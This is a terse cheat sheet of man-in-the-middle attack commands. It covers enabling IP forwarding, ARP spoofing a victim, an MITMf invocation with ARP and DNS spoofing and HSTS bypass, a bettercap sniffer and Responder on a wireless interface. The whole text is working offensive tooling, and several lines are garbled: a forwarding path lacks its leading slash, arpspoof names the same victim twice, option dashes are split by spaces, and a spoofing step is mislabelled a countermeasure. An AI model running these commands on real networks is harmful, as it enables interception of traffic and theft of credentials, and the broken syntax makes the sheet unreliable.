MiTM

MiTMf

  Enable IP forwarding

# echo 1 > proc/sys/net/ipv4/ip_forward

  Do arpspoof in separate window(Countermeasure)

# ./arpspoof -t VICTIM_IP VICTIM_IP

  MiTMf

# ./mitmf - -spoof - -arp - -gateway 192.168.1.1 - -target  VICTIM_IP - -dns - -hsts -i wlan0

Bettercap

# bettercap --sniffer -G 192.168.1.1

Responder

# ./Responder.py -I wlan0